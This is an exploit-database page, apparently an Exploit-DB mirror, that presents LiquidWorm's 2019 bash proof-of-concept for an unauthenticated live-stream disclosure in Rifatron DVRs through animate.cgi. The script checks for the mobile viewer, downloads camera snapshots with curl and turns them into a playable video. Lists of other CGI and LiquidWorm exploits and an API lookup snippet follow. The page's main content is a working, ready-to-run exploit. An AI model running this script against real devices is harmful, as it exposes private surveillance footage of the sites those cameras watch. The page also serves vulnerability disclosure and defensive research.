Menu

Search for hundreds of thousands of exploits

"Rifatron Intelligent Digital Security System - 'animate.cgi' Stream Disclosure"

Author

LiquidWorm

Platform

cgi

Release date

2019-09-09

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
#!/bin/bash
#
#
# Rifatron Intelligent Digital Security System (animate.cgi) Stream Disclosure
#
#
# Vendor: Rifatron Co., Ltd. | SAM MYUNG Co., Ltd.
# Product web page: http://www.rifatron.com
# Affected version: 5brid DVR (HD6-532/516, DX6-516/508/504, MX6-516/508/504, EH6-504)
#                   7brid DVR (HD3-16V2, DX3-16V2/08V2/04V2, MX3-08V2/04V2)
#                   Firmware: <=8.0 (000143)
#
#
# Summary: Rifatron with its roots in Seoul, Korea has been supplying and
# servicing the security market as a leading CCTV/video surveillance security
# system manufacturer, specializing in stand-alone digital video recorder since
# 1998. We are known for marking the first standalone DVR with audio detection
# and 480 frames per secone(fps) and have been focusing on highend products and
# large projects in a variety applications and merket. These include government
# and public services, banking and finance, hotels and entertatinment, retail
# education, industrial and commercial sectors throughout Europe, Middle East,
# the U.S. and Asia. Based on the accumulated know-how in the security industry,
# Rifatron is trying its utmost for the technology development and customer
# satisfaction to be the best security solution company in the world.
#
# Desc: The DVR suffers from an unauthenticated and unauthorized live stream
# disclosure when animate.cgi script is called through Mobile Web Viewer module.
#
# Tested on: Embedded Linux
#            Boa/0.94.14rc21
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
#
#
# Advisory ID: ZSL-2019-5532
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5532.php
#
#
# 03.09.2019
#

#{PoC}
#
set -euo pipefail
IFS=$'\n\t'
if [ "$#" -ne 2 ]; then
    echo "Usage: $0 IP:PORT CHANNEL" # Valid channel integers: 0-15
    echo "Ex.: $0 10.9.8.7:65432 10"
    exit
fi
IP=$1
CHANNEL=$2
HOST="http://$IP/cgi-bin/animate.cgi?$CHANNEL"
STATUS=$(curl -Is http://$IP/mobile_viewer_login.html 2>/dev/null | head -1 | awk -F" " '{print $2}')
if [ "$STATUS" == "404" ]; then
    echo "Target not vulnerable!"
    exit
fi
echo "Collecting snapshots..."
for x in {1..10};
    do echo -ne $x
    curl "$HOST" -o sequence-$x.jpg -#;
    sleep 0.6
    done
echo -ne "\nDone."
echo -ne "\nRendering video..."
ffmpeg -t 10 -v quiet -s 352x288 -r 1 -an -i sequence-%01d.jpg -c:v libx264 -vf fps=10 -pix_fmt yuvj422p video.mp4
echo " done."
echo -ne "\nRunning animation..."
sleep 1
cvlc video.mp4 --verbose -1 -f vlc://quit
#
#{/PoC}
Release Date Title Type Platform Author
2019-09-09 "Rifatron Intelligent Digital Security System - 'animate.cgi' Stream Disclosure" webapps cgi LiquidWorm
2019-07-12 "Citrix SD-WAN Appliance 10.2.2 - Authentication Bypass / Remote Command Execution" webapps cgi "Chris Lyne"
2019-02-18 "Master IP CAM 01 3.3.4.2103 - Remote Command Execution" webapps cgi "Raffaele Sabato"
2019-02-11 "IPFire 2.21 - Cross-Site Scripting" webapps cgi "Ozer Goker"
2019-02-11 "Smoothwall Express 3.1-SP4 - Cross-Site Scripting" webapps cgi "Ozer Goker"
2019-01-24 "SirsiDynix e-Library 3.5.x - Cross-Site Scripting" webapps cgi AkkuS
2019-01-14 "AudioCode 400HD - Command Injection" webapps cgi Sysdream
2019-01-18 "Webmin 1.900 - Remote Command Execution (Metasploit)" remote cgi AkkuS
2019-01-07 "PLC Wireless Router GPN2.4P21-C-CN - Cross-Site Scripting" webapps cgi "Kumar Saurav"
2018-11-30 "Synaccess netBooter NP-02x/NP-08x 6.8 - Authentication Bypass" webapps cgi LiquidWorm
2018-08-15 "ASUSTOR ADM 3.1.0.RFQ3 - Remote Command Execution / SQL Injection" webapps cgi "Kyle Lovett"
2018-08-03 "cgit < 1.2.1 - 'cgit_clone_objects()' Directory Traversal" webapps cgi "Google Security Research"
2018-03-30 "Homematic CCU2 2.29.23 - Remote Command Execution" webapps cgi "Patrick Muench and Gregor Kopf"
2018-03-30 "Homematic CCU2 2.29.23 - Arbitrary File Write" webapps cgi "Patrick Muench and Gregor Kopf"
2017-12-15 "ITGuard-Manager 0.0.0.1 - Remote Code Execution" webapps cgi "Nassim Asrir"
2017-12-13 "Meinberg LANTIME Web Configuration Utility 6.16.008 - Arbitrary File Read" webapps cgi "Jakub Palaczynski"
2017-11-28 "Synology StorageManager 5.2 - Root Remote Command Execution" webapps cgi SecuriTeam
2017-10-15 "Webmin 1.850 - Multiple Vulnerabilities" webapps cgi hyp3rlinx
2017-10-18 "Linksys E Series - Multiple Vulnerabilities" webapps cgi "SEC Consult"
2017-07-19 "Citrix CloudBridge - 'CAKEPHP' Cookie Command Injection" webapps cgi xort
2017-07-19 "Sonicwall < 8.1.0.2-14sv - 'sitecustomization.cgi' Command Injection (Metasploit)" webapps cgi xort
2017-07-19 "Netscaler SD-WAN 9.1.2.26.561201 - Command Injection (Metasploit)" webapps cgi xort
2017-07-19 "Sonicwall < 8.1.0.6-21sv - 'gencsr.cgi' Command Injection (Metasploit)" webapps cgi xort
2017-07-19 "Sonicwall Secure Remote Access 8.1.0.2-14sv - Command Injection" webapps cgi xort
2017-06-06 "Peplink Balance Routers 7.0.0-build1904 - SQL Injection / Cross-Site Scripting / Information Disclosure" webapps cgi "X41 D-Sec GmbH"
2017-04-07 "QNAP TVS-663 QTS < 4.2.4 build 20170313 - Command Injection" webapps cgi "Harry Sintonen"
2018-01-08 "Synology DiskStation Manager (DSM) < 6.1.3-15152 - 'forget_passwd.cgi' User Enumeration" webapps cgi "Steve Kaun"
2017-03-10 "dnaLIMS DNA Sequencing - Directory Traversal / Session Hijacking / Cross-Site Scripting" webapps cgi "Shorebreak Security"
2017-01-27 "Radisys MRF - Command Injection" webapps cgi "Filippos Mastrogiannis"
2016-12-07 "NETGEAR R7000 - Command Injection" webapps cgi Acew0rm
Release Date Title Type Platform Author
2019-09-09 "Rifatron Intelligent Digital Security System - 'animate.cgi' Stream Disclosure" webapps cgi LiquidWorm
2019-07-18 "WordPress Plugin OneSignal 1.17.5 - 'subdomain' Persistent Cross-Site Scripting" webapps linux LiquidWorm
2019-07-01 "FaceSentry Access Control System 6.4.8 - Remote Root Exploit" webapps hardware LiquidWorm
2019-07-01 "FaceSentry Access Control System 6.4.8 - Cross-Site Request Forgery" webapps hardware LiquidWorm
2019-07-01 "FaceSentry Access Control System 6.4.8 - Remote Command Injection" webapps hardware LiquidWorm
2019-07-01 "FaceSentry Access Control System 6.4.8 - Remote SSH Root" remote hardware LiquidWorm
2019-05-20 "Huawei eSpace 1.1.11.103 - DLL Hijacking" local windows LiquidWorm
2019-05-20 "Huawei eSpace 1.1.11.103 - 'ContactsCtrl.dll' / 'eSpaceStatusCtrl.dll' ActiveX Heap Overflow" dos windows LiquidWorm
2019-05-20 "Huawei eSpace 1.1.11.103 - Image File Format Handling Buffer Overflow" dos windows LiquidWorm
2019-05-20 "Huawei eSpace Meeting 1.1.11.103 - 'cenwpoll.dll' SEH Buffer Overflow (Unicode)" dos windows LiquidWorm
2019-05-15 "Legrand BTicino Driver Manager F454 1.0.51 - Cross-Site Request Forgery / Cross-Site Scripting" webapps php LiquidWorm
2019-05-16 "SEL AcSELerator Architect 2.2.24 - CPU Exhaustion Denial of Service" dos windows LiquidWorm
2019-05-13 "SOCA Access Control System 180612 - Cross-Site Request Forgery (Add Admin)" webapps php LiquidWorm
2019-05-13 "SOCA Access Control System 180612 - SQL Injection" webapps php LiquidWorm
2019-05-13 "SOCA Access Control System 180612 - Information Disclosure" webapps php LiquidWorm
2019-04-23 "Ross Video DashBoard 8.5.1 - Insecure Permissions" local windows LiquidWorm
2019-03-14 "Intel Modular Server System 10.18 - Cross-Site Request Forgery (Change Admin Password)" webapps php LiquidWorm
2019-02-05 "BEWARD N100 H.264 VGA IP Camera M2.1.6 - Arbitrary File Disclosure" webapps hardware LiquidWorm
2019-02-05 "BEWARD N100 H.264 VGA IP Camera M2.1.6 - Remote Code Execution" webapps hardware LiquidWorm
2019-02-05 "BEWARD N100 H.264 VGA IP Camera M2.1.6 - Cross-Site Request Forgery (Add Admin)" webapps hardware LiquidWorm
2019-02-05 "BEWARD N100 H.264 VGA IP Camera M2.1.6 - RTSP Stream Disclosure" webapps hardware LiquidWorm
2019-01-28 "BEWARD Intercom 2.3.1 - Credentials Disclosure" local windows LiquidWorm
2019-01-07 "Leica Geosystems GR10/GR25/GR30/GR50 GNSS 4.30.063 - JS/HTML Code Injection" webapps windows LiquidWorm
2019-01-07 "Leica Geosystems GR10/GR25/GR30/GR50 GNSS 4.30.063 - Cross-Site Request Forgery" webapps windows LiquidWorm
2018-11-30 "Synaccess netBooter NP-02x/NP-08x 6.8 - Authentication Bypass" webapps cgi LiquidWorm
2018-11-21 "Synaccess netBooter NP-0801DU 7.4 - Cross-Site Request Forgery (Add Admin)" webapps hardware LiquidWorm
2018-11-05 "Microsoft Internet Explorer 11 - Null Pointer Dereference" local windows LiquidWorm
2018-10-17 "TP-Link TL-SC3130 1.6.18 - RTSP Stream Disclosure" webapps hardware LiquidWorm
2018-10-15 "FLIR AX8 Thermal Camera 1.32.16 - Remote Code Execution" webapps hardware LiquidWorm
2018-10-15 "FLIR Brickstream 3D+ 2.1.742.1842 - Config File Disclosure" webapps hardware LiquidWorm
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/47368/?format=json')
                        {"url": "https://www.nmmapper.com/api/exploitdetails/47368/?format=json", "download_file": "https://www.nmmapper.com/st/exploitdetails/47368/41722/rifatron-intelligent-digital-security-system-animatecgi-stream-disclosure/download/", "exploit_id": "47368", "exploit_description": "\"Rifatron Intelligent Digital Security System - 'animate.cgi' Stream Disclosure\"", "exploit_date": "2019-09-09", "exploit_author": "LiquidWorm", "exploit_type": "webapps", "exploit_platform": "cgi", "exploit_port": null}
                    

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Wig is a web application information gathering tool, which can identify numerous Content Management Systems and other administrative applications including basic vulnerability identification.

Browse exploit APIBrowse